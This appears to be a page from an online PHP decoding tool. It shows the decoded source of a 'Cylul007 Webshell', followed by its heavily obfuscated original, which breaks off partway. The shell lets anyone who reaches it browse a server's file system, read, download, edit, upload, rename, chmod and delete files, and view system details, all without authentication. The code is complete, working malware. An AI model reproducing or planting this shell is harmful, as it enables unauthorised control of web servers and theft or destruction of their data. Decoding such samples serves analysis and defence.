Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
goto X02hQ; brTpt: foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = tr..
Decoded Output download
<? goto X02hQ; brTpt: foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true; echo "<a href="?path=/">/</a>"; continue; } if ($pat == '') { continue; } echo "<a href="?path="; for ($i = 0; $i <= $id; $i++) { echo "{$paths[$i]}"; if ($i != $id) { echo "/"; } } echo "">" . $pat . "</a>/"; } goto Xqbjn; jZ5YR: $system = php_uname(); goto ceZP4; YkDMb: $un_link = "unlink"; goto ZZcji; WnU3I: $sc4nd1r = "scandir"; goto P3m6y; TOyQX: echo "<center><br/>Copyright © 2018 - Powered By CytoXploit</center>
</body>
</html>"; goto OMG6Z; ZZcji: $fgetents = "file_get_contents"; goto iDTMt; yXRn7: if (get_magic_quotes_gpc()) { foreach ($_POST as $key => $value) { $_POST[$key] = stripslashes($value); } } goto jZ5YR; STqMn: $get_dir = "g" . "etcwd"; goto YkDMb; Xqbjn: echo "</td></tr><tr><td>"; goto zZBvI; OMG6Z: function perms($file) { $perms = fileperms($file); if (($perms & 49152) == 49152) { $info = "s"; } elseif (($perms & 40960) == 40960) { $info = "l"; } elseif (($perms & 32768) == 32768) { $info = "-"; } elseif (($perms & 24576) == 24576) { $info = "b"; } elseif (($perms & 16384) == 16384) { $info = "d"; } elseif (($perms & 8192) == 8192) { $info = "c"; } elseif (($perms & 4096) == 4096) { $info = "p"; } else { $info = "u"; } $info .= $perms & 256 ? "r" : "-"; $info .= $perms & 128 ? "w" : "-"; $info .= $perms & 64 ? $perms & 2048 ? "s" : "x" : ($perms & 2048 ? "S" : "-"); $info .= $perms & 32 ? "r" : "-"; $info .= $perms & 16 ? "w" : "-"; $info .= $perms & 8 ? $perms & 1024 ? "s" : "x" : ($perms & 1024 ? "S" : "-"); $info .= $perms & 4 ? "r" : "-"; $info .= $perms & 2 ? "w" : "-"; $info .= $perms & 1 ? $perms & 512 ? "t" : "x" : ($perms & 512 ? "T" : "-"); return $info; } goto HC3Bq; P3m6y: if (isset($_GET["file"]) && $_GET["file"] != '' && $_GET["act"] == "download") { @ob_clean(); $file = $_GET["file"]; header("Content-Description: File Transfer"); header("Content-Type: application/octet-stream"); header("Content-Disposition: attachment; filename="" . basename($file) . """); header("Expires: 0"); header("Cache-Control: must-revalidate"); header("Pragma: public"); header("Content-Length: " . filesize($file)); readfile($file); die; } goto ZiMNP; QpFh3: set_time_limit(0); goto yXRn7; z_eAD: if (isset($_GET["filesrc"])) { echo "<tr><td>Current File : "; echo $_GET["filesrc"]; echo "</tr></td></table><br />"; echo "<center><a href="?act=download&dir=" . $path . "&file=" . $_GET["filesrc"] . "" class="destroy_table"><font color="red">Download</a></font> <a href="?" class="destroy_table"><font color="red">HOME</a></font> <br></center>"; echo "<center><textarea cols=115 rows=20>" . htmlspecialchars($fgetents($_GET["filesrc"])) . "</textarea>"; } elseif (isset($_GET["option"]) && $_POST["opt"] != "delete") { echo "</table><br /><center>" . $_POST["path"] . "<br /><br />"; if ($_POST["opt"] == "chmod") { if (isset($_POST["perm"])) { if (chmod($_POST["path"], $_POST["perm"])) { echo "<font color="lime">Change Permission Successfull</font><br/>"; } else { echo "<font color="red">Change Permission Failed</font><br />"; } } echo "<form method="POST">
Permission : <input name="perm" type="text" size="4" value="" . substr(sprintf("%o", fileperms($_POST["path"])), -4) . "" />
<input type="hidden" name="path" value="" . $_POST["path"] . "">
<input type="hidden" name="opt" value="chmod">\xa<input type="submit" value="Go" />
</form>"; } elseif ($_POST["opt"] == "rename") { if (isset($_POST["newname"])) { if (rename($_POST["path"], $path . "/" . $_POST["newname"])) { echo "<font color="green">Rename Successfull</font><br/>"; } else { echo "<font color="red">Rename Failed</font><br />"; } $_POST["name"] = $_POST["newname"]; } echo "<form method="POST">\xaNew Name : <input name="newname" type="text" size="20" value="" . $_POST["name"] . "" />\xa<input type="hidden" name="path" value="" . $_POST["path"] . "">\xa<input type="hidden" name="opt" value="rename">
<input type="submit" value="Go" />
</form>"; } elseif ($_POST["opt"] == "edit") { if (isset($_POST["src"])) { $fp = fopen($_POST["path"], "w"); if (fwrite($fp, $_POST["src"])) { echo "<font color="lime">File Edited</font><br/>"; } else { echo "<font color="red">File Cannot Be Edit</font><br/>"; } fclose($fp); } echo "<form method="POST">\xa<textarea cols=115 rows=20 name="src">" . htmlspecialchars($fgetents($_POST["path"])) . "</textarea><br />
<input type="hidden" name="path" value="" . $_POST["path"] . "">\xa<input type="hidden" name="opt" value="edit">\xa<input type="submit" value="Save" />\xa</form>"; } echo "</center>"; } else { echo "</table><br/><center>"; if (isset($_GET["option"]) && $_POST["opt"] == "delete") { if ($_POST["type"] == "dir") { if ($rm_dir($_POST["path"])) { echo "<font color="lime">Directory Deleted</font><br/>"; } else { echo "<font color="red">Directory Cannot Be Deleted</font><br/>"; } } elseif ($_POST["type"] == "file") { if ($un_link($_POST["path"])) { echo "<font color="lime">File Deleted</font><br/>"; } else { echo "<font color="red">File Cannot Be Deleted</font><br/>"; } } } elseif ($_GET["opt"] == "newfolder") { if ($_POST["new_save_folder"]) { $new_folder = $path . "/" . htmlspecialchars($_POST["newfolder"]); if (!mkdir($new_folder)) { $opt = "<font color=red>Folder Cannot Be Created</font>"; } else { $opt = "<font color=lime>Folder Created</font>"; } } echo $opt; echo "<form method='post'>\xa\x9<font color='red'>Folder Name: </font><input type='text' name='newfolder' style='width: 300px;' height='10'>\xa <input type='submit' name='new_save_folder' value='Submit'>
\x9</form>"; } elseif ($_GET["do"] == "newfile") { ?>
<center><h1><font color="red">Add File</h1><table><form action=""method="post"><h2>Isi File :<br></h2><textarea cols="115"name="penjelasan"rows="10"> </textarea> <font color="red">Nama File: </font><input name="name"style="width:300px"><input name="ok"type="submit"value="Simpan"></form></table></center><?php if (isset($_POST["ok"])) { if (empty($_POST["name"])) { print "Fill The Name Bastard!!!"; } else { $filename = $_POST["name"]; if (isset($_POST["penjelasan"])) { $data = $_POST["penjelasan"]; } $buka = fopen("{$filename}", "a+"); fwrite($buka, "{$data}"); fclose($buka); if ($buka) { echo "<font color='lime'>File Created</a></font>"; } else { echo "<font color='red'>Cannot Create File</a></font>"; } } } } echo "</center>"; $scandir = $sc4nd1r($path); echo "<div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">\xa<tr class="first">\xa<td><center>Name</peller></center></td>
<td><center>Type</peller></center></td>\xa<td><center>Size</peller></center></td>
<td><center>Last Modified</peller></center></td>
<td><center>Permission</peller></center></td>
<td><center>Action</peller></center></td>\xa</tr>"; foreach ($scandir as $dir) { if (!is_dir($path . "/" . $dir) || $dir == "." || $dir == "..") { continue; } $dtype = filetype("{$path}/{$dir}"); $dtime = date("Y/m/d", filemtime("{$path}/{$dir}")); echo "<tr>\xa<td><img src="https://i.ibb.co/PwD5v2F/folder.png" width="15" height="15"><a href="?path=" . $path . "/" . $dir . "">" . $dir . "</a></td>
<td><center>" . $dtype . "</center></td>\xa<td><center>--</center></td>
<td><center>" . $dtime . "</center></td>
<td><center>"; if (is_writable($path . "/" . $dir)) { echo "<font color="lime">"; } elseif (!is_readable($path . "/" . $dir)) { echo "<font color="red">"; } echo perms($path . "/" . $dir); if (is_writable($path . "/" . $dir) || !is_readable($path . "/" . $dir)) { echo "</font>"; } echo "</center></td>\xa<td><center><form method="POST" action="?option&path=" . $path . "">\xa<select name="opt">
<option value="">Select</option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>\xa</select>\xa<input type="hidden" name="type" value="dir">
<input type="hidden" name="name" value="" . $dir . "">\xa<input type="hidden" name="path" value="" . $path . "/" . $dir . "">\xa<input type="submit" value=">>>">\xa</form></center></td>\xa</tr>"; } echo "<tr class="first"><td></td><td></td><td></td><td></td><td></td><td></td></tr>"; foreach ($scandir as $file) { if (!is_file($path . "/" . $file)) { continue; } $ftype = filetype("{$path}/{$file}"); $ftime = date("Y/m/d", filemtime("{$path}/{$file}")); $size = filesize($path . "/" . $file) / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . " MB"; } else { $size = $size . " KB"; } echo "<tr>\xa<td><img src="https://i.ibb.co/NNRhXp3/def-file.png" width="15" height="15"><a href="?filesrc=" . $path . "/" . $file . "&path=" . $path . "">" . $file . "</a></td>\xa<td><center>" . $ftype . "</center></td>
<td><center>" . $size . "</center></td>
<td><center>" . $ftime . "</center></td>
<td><center>"; if (is_writable($path . "/" . $file)) { echo "<font color="lime">"; } elseif (!is_readable($path . "/" . $file)) { echo "<font color="red">"; } echo perms($path . "/" . $file); if (is_writable($path . "/" . $file) || !is_readable($path . "/" . $file)) { echo "</font>"; } echo "</center></td>\xa<td><center><form method="POST" action="?option&path=" . $path . "">\xa<select name="opt">\xa<option value="">Select</option>\xa<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
<option value="edit">Edit</option>
</select>
<input type="hidden" name="type" value="file">\xa<input type="hidden" name="name" value="" . $file . "">
<input type="hidden" name="path" value="" . $path . "/" . $file . "">
<input type="submit" value=">>>">\xa</form></center></td>\xa</tr>"; } echo "<tr class="first"><td></td><td></td><td></td><td></td><td></td><td></td></tr></table>
</div>"; } goto TOyQX; sUXNU: if (isset($_GET["path"])) { $path = $_GET["path"]; } else { $path = $get_dir(); } goto sTTAr; rvBCr: echo "<form enctype="multipart/form-data" method="POST">
<font color="white">File Upload :</font> <input type="file" name="file" /><input type="submit" value="upload" /></form></td></tr>"; goto WQnWr; xqpzo: $paths = explode("/", $path); goto brTpt; ceZP4: $on = php_sapi_name(); goto STqMn; zZBvI: if (isset($_FILES["file"])) { if (copy($_FILES["file"]["tmp_name"], $path . "/" . $_FILES["file"]["name"])) { echo "<font color="lime">Upload Successfull</font><br />"; } else { echo "<font color="red">Upload Failed</font><br/>"; } } goto rvBCr; X02hQ: error_reporting(0); goto QpFh3; OCBj9: echo "<li class="destroy_table"><a href="?path=" . $path . "&opt=newfolder">New Folder</a></li></center>"; goto z_eAD; ZiMNP: echo "<!DOCTYPE HTML><html><head><link href=""rel="stylesheet"><title>Cylul007 Webshell</title><style>\xabody{font-size:18px;font-family:"Racing Sans One",sans-serif;background-color:#000;color:#fff}#content tr:hover{background-color:red;text-shadow:0 0 10px #fff}#content .first{background-color:red}table{border:1px #000 dotted}a{color:#fff;text-decoration:none}a:hover{color:#00f;text-shadow:0 0 10px #fff}input[type=text],input[type=file],input[type=email],input[type=password],select{background:#111;color:red;border:0;padding:2px;border-bottom:1px solid #222;border-top:1px solid #222;-moz-border-radius:5px;-moz-box-shadow:0px 0px 10px color: red;-webkit-box-shadow:0 0 5px}input[type=submit],input[type=reset]{background-color:#000;color:red;border:1 solid red;border-radius:5px;box-shadow:0 2px 8px 0 red;text-align:center;margin:5px 2px;padding:2px;cursor:pointer}input[type=text],input[type=file],input[type=email],input[type=password],select:hover{border:1px solid red;background-color:#000;color:red}input[type=submit],input[type=reset]:hover{border-bottom:1px solid red;border-top:1px solid red;-moz-border-radius:5px;-moz-box-shadow:0px 0px 10px color: red;-webkit-box-shadow:0 0 5px}textarea{background-color:red;color:#fff}td{border:1px solid red;border-collapse:collapse;padding:5px}.destroy_table{background:0 0;border:1px solid red;font-family:Kelly Slab;display:inline-block;cursor:pointer;color:#fff;font-size:17x;font-weight:700;padding:3px 20px;text-decoration:#fff;text-shadow:0 0 0 #ff0505}li{display:inline;margin:1px;padding:1px}#menu a{padding:1px;margin:1px;background:#000;text-decoration:none;letter-spacing:2px;letter-spacing:2px;border-radius:1px;border-bottom:1px solid red;border-top:1px solid red;border-right:1px solid red;border-left:1px solid red}#menu a:hover{background:#000;border-bottom:0 solid #000;border-top:0 solid #000}hr{color:red}
</style><body><h1><center><font color="red">Cylul007 Webshell</font></center></h1>\xa<tr><td><center><font color="red">Uname </font><td>: <font color="lime">" . $system . "</font></tr></td><br><tr><td><font color="red">PHP </font><td>: <font color="lime">" . PHP_VERSION . " </font><font color="white">on </font><font color="lime">" . $on . "</font></tr></td><br><tr><td><font color="red">Time </font><td>: <font color="lime">" . date("d M Y H:i:s", time()) . " </font></tr></td></center><br>
<table width="500" border="0" cellpadding="3" cellspacing="1" align="center">\xa<tr><td><font color="white">Path :</font> "; goto sUXNU; sTTAr: $path = str_replace("\", "/", $path); goto xqpzo; WQnWr: echo "<center><li class="destroy_table"><a href="?path=" . $path . "&do=newfile">New File</a></li>"; goto OCBj9; iDTMt: $rm_dir = "rmdir"; goto WnU3I; HC3Bq: ?>Did this file decode correctly?
Original Code
goto X02hQ; brTpt: foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true; echo "\74\x61\x20\x68\x72\x65\146\x3d\42\x3f\x70\x61\164\150\75\57\42\76\57\x3c\57\x61\x3e"; continue; } if ($pat == '') { continue; } echo "\74\141\40\x68\x72\145\x66\75\x22\x3f\160\141\164\x68\75"; for ($i = 0; $i <= $id; $i++) { echo "{$paths[$i]}"; if ($i != $id) { echo "\57"; } } echo "\x22\x3e" . $pat . "\x3c\57\x61\x3e\x2f"; } goto Xqbjn; jZ5YR: $system = php_uname(); goto ceZP4; YkDMb: $un_link = "\x75\x6e\x6c\x69\x6e\153"; goto ZZcji; WnU3I: $sc4nd1r = "\x73\x63\141\156\144\x69\162"; goto P3m6y; TOyQX: echo "\74\x63\x65\156\x74\145\162\76\74\142\162\57\x3e\103\157\160\x79\x72\x69\x67\150\x74\x20\46\x63\157\x70\x79\x3b\x20\x32\60\x31\70\40\x2d\40\x50\x6f\x77\x65\x72\x65\144\40\x42\x79\40\x43\171\x74\157\x58\160\x6c\157\x69\164\x3c\x2f\143\145\156\x74\145\162\x3e\12\74\x2f\142\x6f\x64\x79\x3e\12\74\57\150\x74\x6d\154\76"; goto OMG6Z; ZZcji: $fgetents = "\x66\x69\154\x65\x5f\x67\145\164\x5f\x63\157\156\164\145\156\x74\x73"; goto iDTMt; yXRn7: if (get_magic_quotes_gpc()) { foreach ($_POST as $key => $value) { $_POST[$key] = stripslashes($value); } } goto jZ5YR; STqMn: $get_dir = "\x67" . "\145\x74\x63\x77\x64"; goto YkDMb; Xqbjn: echo "\74\57\x74\144\76\74\x2f\x74\162\76\x3c\x74\162\76\x3c\164\144\76"; goto zZBvI; OMG6Z: function perms($file) { $perms = fileperms($file); if (($perms & 49152) == 49152) { $info = "\x73"; } elseif (($perms & 40960) == 40960) { $info = "\x6c"; } elseif (($perms & 32768) == 32768) { $info = "\55"; } elseif (($perms & 24576) == 24576) { $info = "\142"; } elseif (($perms & 16384) == 16384) { $info = "\144"; } elseif (($perms & 8192) == 8192) { $info = "\143"; } elseif (($perms & 4096) == 4096) { $info = "\160"; } else { $info = "\165"; } $info .= $perms & 256 ? "\162" : "\x2d"; $info .= $perms & 128 ? "\x77" : "\55"; $info .= $perms & 64 ? $perms & 2048 ? "\163" : "\x78" : ($perms & 2048 ? "\x53" : "\x2d"); $info .= $perms & 32 ? "\x72" : "\x2d"; $info .= $perms & 16 ? "\167" : "\x2d"; $info .= $perms & 8 ? $perms & 1024 ? "\x73" : "\x78" : ($perms & 1024 ? "\123" : "\x2d"); $info .= $perms & 4 ? "\162" : "\x2d"; $info .= $perms & 2 ? "\x77" : "\55"; $info .= $perms & 1 ? $perms & 512 ? "\x74" : "\x78" : ($perms & 512 ? "\124" : "\x2d"); return $info; } goto HC3Bq; P3m6y: if (isset($_GET["\146\151\154\x65"]) && $_GET["\x66\151\154\145"] != '' && $_GET["\x61\x63\164"] == "\x64\x6f\x77\156\x6c\157\141\144") { @ob_clean(); $file = $_GET["\x66\151\x6c\x65"]; header("\x43\157\x6e\164\x65\156\x74\55\104\x65\x73\143\x72\x69\160\x74\x69\x6f\156\x3a\x20\106\151\154\145\40\x54\x72\141\x6e\163\146\x65\x72"); header("\103\x6f\156\x74\145\156\x74\55\124\x79\160\145\72\x20\x61\x70\160\x6c\x69\x63\141\164\x69\x6f\156\57\157\143\x74\x65\164\x2d\163\164\162\x65\141\155"); header("\x43\157\x6e\164\145\x6e\164\x2d\104\151\x73\x70\x6f\x73\151\164\x69\157\x6e\x3a\x20\141\x74\x74\141\143\x68\155\145\156\164\73\40\x66\x69\154\x65\156\x61\x6d\145\x3d\42" . basename($file) . "\42"); header("\105\x78\x70\x69\x72\145\x73\x3a\x20\x30"); header("\103\141\143\x68\x65\55\103\x6f\x6e\164\162\157\154\72\x20\x6d\x75\163\164\55\162\145\166\141\x6c\x69\x64\x61\164\145"); header("\120\162\x61\147\x6d\141\x3a\x20\x70\x75\x62\154\151\x63"); header("\x43\x6f\156\x74\x65\x6e\x74\x2d\x4c\x65\156\x67\164\150\72\40" . filesize($file)); readfile($file); die; } goto ZiMNP; QpFh3: set_time_limit(0); goto yXRn7; z_eAD: if (isset($_GET["\x66\x69\x6c\x65\x73\x72\143"])) { echo "\x3c\164\162\x3e\x3c\164\x64\76\103\x75\162\162\x65\156\164\x20\x46\151\154\x65\x20\x3a\40"; echo $_GET["\146\x69\154\x65\x73\x72\x63"]; echo "\74\x2f\164\162\x3e\x3c\57\x74\144\x3e\x3c\57\x74\141\142\154\145\76\74\x62\162\x20\x2f\x3e"; echo "\x3c\143\145\156\x74\x65\x72\x3e\x3c\x61\x20\x68\x72\145\x66\75\x22\x3f\141\x63\x74\75\144\x6f\167\x6e\154\x6f\141\x64\x26\x64\151\162\x3d" . $path . "\x26\146\x69\154\145\75" . $_GET["\146\x69\154\x65\163\x72\x63"] . "\42\x20\143\x6c\141\x73\163\x3d\42\x64\145\163\164\x72\x6f\171\137\x74\141\142\x6c\145\42\76\x3c\146\157\156\164\40\x63\157\154\157\162\x3d\x22\162\x65\144\42\x3e\x44\157\167\x6e\x6c\157\x61\x64\x3c\x2f\141\76\74\x2f\x66\x6f\156\x74\x3e\40\x26\x6e\x62\x73\160\x3b\x26\x6e\142\x73\x70\73\x20\x3c\x61\40\x68\x72\145\146\75\x22\77\x22\x20\143\x6c\141\x73\163\x3d\42\144\x65\163\x74\162\157\x79\137\x74\141\x62\x6c\145\x22\76\x3c\146\157\x6e\x74\40\143\157\x6c\157\162\75\x22\162\145\x64\x22\x3e\x48\x4f\x4d\105\x3c\57\x61\76\x3c\x2f\x66\x6f\156\x74\76\40\x3c\142\x72\76\x3c\57\x63\145\x6e\x74\145\x72\x3e"; echo "\74\x63\145\x6e\x74\145\x72\76\x3c\x74\x65\x78\x74\x61\x72\145\141\x20\143\x6f\154\x73\x3d\61\x31\65\x20\x72\157\x77\163\75\x32\x30\x3e" . htmlspecialchars($fgetents($_GET["\x66\x69\154\x65\x73\x72\143"])) . "\74\57\164\145\x78\164\x61\162\x65\x61\76"; } elseif (isset($_GET["\157\160\x74\x69\x6f\x6e"]) && $_POST["\x6f\x70\x74"] != "\144\x65\x6c\x65\x74\145") { echo "\74\57\x74\141\142\154\x65\76\74\x62\x72\40\57\76\74\143\x65\x6e\164\145\x72\76" . $_POST["\160\x61\x74\150"] . "\x3c\142\x72\40\x2f\x3e\x3c\x62\x72\x20\x2f\x3e"; if ($_POST["\157\160\x74"] == "\143\150\x6d\x6f\144") { if (isset($_POST["\160\x65\x72\x6d"])) { if (chmod($_POST["\x70\141\x74\x68"], $_POST["\160\145\x72\155"])) { echo "\x3c\x66\x6f\x6e\x74\40\x63\x6f\x6c\157\x72\75\42\154\x69\x6d\x65\x22\76\103\150\141\156\147\x65\x20\x50\145\162\155\x69\163\x73\x69\157\x6e\40\123\x75\x63\x63\x65\x73\163\x66\x75\154\154\74\x2f\x66\x6f\x6e\164\x3e\74\x62\162\57\x3e"; } else { echo "\x3c\146\x6f\156\x74\x20\143\157\154\157\x72\x3d\42\x72\x65\144\x22\76\x43\x68\141\x6e\147\145\40\x50\x65\x72\x6d\151\163\x73\151\157\156\x20\106\141\x69\x6c\x65\144\74\57\146\x6f\156\x74\76\x3c\142\162\x20\57\76"; } } echo "\74\x66\x6f\162\155\x20\155\145\164\150\157\x64\75\42\x50\117\123\x54\x22\76\12\x50\x65\x72\155\151\163\163\151\x6f\156\x20\72\40\x3c\151\x6e\160\165\x74\40\x6e\x61\x6d\145\75\x22\160\x65\x72\x6d\42\40\164\171\160\x65\x3d\x22\x74\145\x78\164\42\40\163\x69\172\145\x3d\x22\x34\x22\x20\166\141\x6c\x75\x65\x3d\x22" . substr(sprintf("\x25\157", fileperms($_POST["\x70\141\164\x68"])), -4) . "\42\x20\57\76\12\x3c\x69\156\160\x75\164\x20\164\171\160\145\75\42\x68\x69\x64\x64\145\156\x22\40\x6e\x61\x6d\145\75\x22\160\x61\164\x68\42\40\x76\141\x6c\165\x65\x3d\42" . $_POST["\160\x61\x74\150"] . "\x22\x3e\12\74\x69\156\x70\165\x74\40\164\171\160\145\x3d\x22\150\151\x64\144\145\156\42\40\156\141\x6d\145\75\x22\x6f\x70\164\x22\40\x76\x61\x6c\x75\145\x3d\x22\x63\150\x6d\x6f\144\42\x3e\xa\x3c\x69\x6e\160\165\x74\40\164\171\x70\x65\x3d\42\163\165\142\x6d\x69\x74\x22\x20\166\x61\154\165\145\75\42\107\x6f\42\x20\57\76\12\74\x2f\x66\x6f\x72\x6d\76"; } elseif ($_POST["\x6f\x70\164"] == "\162\x65\x6e\x61\x6d\145") { if (isset($_POST["\x6e\x65\x77\x6e\x61\155\145"])) { if (rename($_POST["\x70\x61\x74\x68"], $path . "\57" . $_POST["\x6e\x65\x77\156\141\x6d\145"])) { echo "\74\x66\157\x6e\x74\40\x63\157\154\157\162\x3d\42\x67\x72\x65\145\x6e\x22\76\x52\x65\156\x61\155\x65\x20\x53\x75\x63\143\145\163\163\146\x75\154\x6c\x3c\x2f\x66\157\x6e\x74\x3e\74\142\162\57\76"; } else { echo "\x3c\146\157\156\164\x20\x63\x6f\154\x6f\x72\x3d\42\162\x65\x64\42\x3e\122\145\156\141\155\145\40\106\x61\x69\x6c\x65\x64\74\x2f\146\x6f\156\164\x3e\x3c\142\x72\x20\57\76"; } $_POST["\156\x61\155\145"] = $_POST["\x6e\x65\167\156\x61\x6d\145"]; } echo "\74\146\157\x72\155\x20\155\x65\164\150\x6f\x64\75\x22\120\x4f\123\x54\42\x3e\xa\116\x65\x77\x20\116\141\155\145\x20\72\40\x3c\151\x6e\x70\165\164\x20\156\x61\155\145\75\42\156\x65\x77\156\141\155\145\42\x20\164\x79\x70\145\75\42\x74\145\x78\164\42\x20\163\x69\172\145\x3d\42\x32\x30\42\x20\x76\x61\x6c\165\145\75\42" . $_POST["\x6e\141\155\145"] . "\x22\40\x2f\76\xa\74\x69\x6e\160\x75\164\x20\164\x79\x70\x65\x3d\x22\150\151\144\x64\x65\x6e\x22\x20\x6e\x61\155\145\x3d\x22\x70\141\x74\x68\42\40\x76\x61\154\165\145\75\x22" . $_POST["\160\141\x74\150"] . "\x22\x3e\xa\74\151\x6e\x70\165\164\x20\x74\x79\160\145\75\x22\x68\151\144\144\145\156\42\x20\x6e\141\155\145\x3d\x22\x6f\x70\x74\42\40\x76\141\x6c\x75\145\x3d\42\x72\x65\x6e\141\155\145\42\76\12\x3c\151\x6e\x70\x75\x74\40\164\x79\x70\145\x3d\x22\x73\165\142\155\x69\164\42\x20\166\141\154\165\145\75\x22\107\x6f\42\x20\57\76\12\x3c\57\146\157\x72\x6d\x3e"; } elseif ($_POST["\x6f\160\164"] == "\x65\144\x69\x74") { if (isset($_POST["\x73\x72\x63"])) { $fp = fopen($_POST["\x70\x61\x74\150"], "\167"); if (fwrite($fp, $_POST["\x73\x72\x63"])) { echo "\x3c\x66\157\156\164\40\x63\157\154\x6f\x72\x3d\42\154\x69\155\x65\42\x3e\x46\x69\x6c\145\x20\x45\x64\x69\164\145\x64\x3c\x2f\x66\157\x6e\164\76\74\x62\162\x2f\x3e"; } else { echo "\x3c\x66\157\x6e\164\40\x63\157\154\157\162\75\42\162\145\144\x22\76\x46\x69\154\x65\x20\103\x61\156\x6e\x6f\x74\40\102\x65\40\x45\x64\x69\164\74\x2f\x66\157\x6e\164\76\74\x62\162\57\x3e"; } fclose($fp); } echo "\74\146\157\x72\x6d\x20\155\x65\x74\150\x6f\144\x3d\x22\x50\x4f\x53\x54\x22\76\xa\x3c\x74\145\170\x74\141\162\x65\141\40\143\157\x6c\163\75\x31\x31\x35\x20\162\157\x77\x73\x3d\62\60\x20\156\141\155\145\x3d\42\163\x72\x63\42\76" . htmlspecialchars($fgetents($_POST["\x70\141\164\150"])) . "\x3c\x2f\x74\x65\170\164\141\162\x65\x61\x3e\74\x62\162\x20\x2f\76\12\x3c\x69\156\x70\165\164\40\164\x79\x70\x65\x3d\42\x68\151\144\144\x65\x6e\x22\40\156\x61\x6d\145\75\42\160\x61\x74\x68\42\40\166\141\x6c\x75\x65\x3d\x22" . $_POST["\x70\141\164\x68"] . "\42\x3e\xa\74\x69\x6e\160\x75\x74\x20\164\171\160\x65\x3d\x22\x68\x69\x64\144\x65\156\42\x20\x6e\141\x6d\x65\x3d\42\x6f\x70\164\42\40\x76\x61\154\x75\145\75\42\x65\144\x69\x74\x22\x3e\xa\74\151\x6e\160\x75\x74\x20\x74\x79\160\145\x3d\42\163\165\x62\x6d\151\x74\x22\40\x76\141\x6c\165\145\x3d\x22\123\x61\x76\x65\x22\40\57\76\xa\74\57\146\x6f\162\155\76"; } echo "\x3c\57\x63\x65\156\x74\145\x72\76"; } else { echo "\74\x2f\x74\141\142\154\x65\x3e\x3c\142\x72\x2f\x3e\x3c\143\145\156\164\145\162\76"; if (isset($_GET["\157\160\164\151\x6f\156"]) && $_POST["\x6f\160\x74"] == "\x64\x65\154\145\x74\x65") { if ($_POST["\x74\171\160\x65"] == "\144\151\x72") { if ($rm_dir($_POST["\160\141\164\x68"])) { echo "\74\x66\157\156\x74\40\x63\157\154\x6f\162\x3d\42\x6c\151\x6d\x65\42\76\x44\151\162\145\143\164\157\x72\171\40\104\x65\154\145\x74\145\x64\x3c\x2f\146\157\156\164\76\x3c\142\162\x2f\x3e"; } else { echo "\x3c\146\x6f\x6e\164\x20\143\157\154\157\x72\75\42\x72\145\x64\x22\x3e\x44\x69\x72\145\x63\164\157\x72\171\40\103\141\156\156\157\x74\40\x42\145\40\104\145\154\x65\x74\x65\144\74\x2f\146\157\156\164\76\74\x62\x72\57\76"; } } elseif ($_POST["\164\x79\x70\x65"] == "\x66\x69\154\x65") { if ($un_link($_POST["\x70\141\x74\x68"])) { echo "\74\x66\x6f\x6e\x74\40\143\157\154\157\162\75\x22\154\151\155\145\42\76\106\151\154\145\40\104\145\154\x65\x74\x65\144\x3c\57\x66\x6f\156\164\x3e\x3c\142\x72\57\76"; } else { echo "\74\146\x6f\x6e\164\40\x63\157\x6c\157\162\x3d\42\x72\145\144\42\x3e\x46\x69\154\145\40\103\x61\156\156\x6f\x74\40\102\145\40\104\145\x6c\145\164\145\144\x3c\x2f\146\157\x6e\164\x3e\74\x62\x72\57\x3e"; } } } elseif ($_GET["\157\x70\x74"] == "\156\x65\x77\x66\157\x6c\144\145\x72") { if ($_POST["\156\145\x77\x5f\163\141\166\145\x5f\146\x6f\154\x64\x65\x72"]) { $new_folder = $path . "\57" . htmlspecialchars($_POST["\156\145\167\146\157\x6c\144\x65\162"]); if (!mkdir($new_folder)) { $opt = "\x3c\x66\x6f\x6e\x74\40\x63\157\x6c\x6f\162\x3d\x72\x65\x64\x3e\x46\157\154\x64\x65\162\x20\x43\x61\156\x6e\157\164\x20\102\145\40\x43\x72\x65\x61\164\145\144\74\x2f\x66\157\156\x74\x3e"; } else { $opt = "\x3c\x66\x6f\156\x74\x20\143\x6f\154\157\x72\75\x6c\x69\155\x65\76\x46\157\154\144\145\162\40\x43\x72\x65\141\164\145\144\74\x2f\146\157\156\164\x3e"; } } echo $opt; echo "\74\146\157\162\x6d\x20\x6d\145\x74\x68\157\x64\75\x27\x70\157\x73\164\x27\76\xa\x9\x3c\x66\x6f\x6e\164\40\143\x6f\x6c\157\162\x3d\x27\x72\x65\x64\x27\x3e\106\x6f\154\x64\145\x72\x20\x4e\141\155\145\72\40\x3c\x2f\x66\x6f\x6e\164\x3e\74\x69\156\x70\x75\164\40\x74\171\x70\x65\75\47\164\145\x78\x74\x27\x20\x6e\141\x6d\x65\x3d\x27\x6e\145\x77\x66\x6f\x6c\x64\145\162\47\40\x73\164\171\154\145\75\x27\x77\151\144\164\x68\x3a\x20\63\60\60\160\x78\73\x27\40\x68\145\x69\x67\x68\164\x3d\x27\61\x30\47\x3e\xa\11\74\x69\x6e\160\x75\x74\40\164\x79\160\x65\75\47\163\x75\142\155\151\164\47\x20\156\141\x6d\x65\x3d\47\x6e\145\x77\x5f\163\x61\x76\145\x5f\x66\x6f\154\x64\145\162\x27\40\x76\x61\154\165\x65\x3d\x27\123\x75\x62\x6d\151\x74\x27\76\12\x9\x3c\x2f\146\157\162\x6d\x3e"; } elseif ($_GET["\x64\157"] == "\x6e\x65\x77\x66\151\x6c\145") { ?>
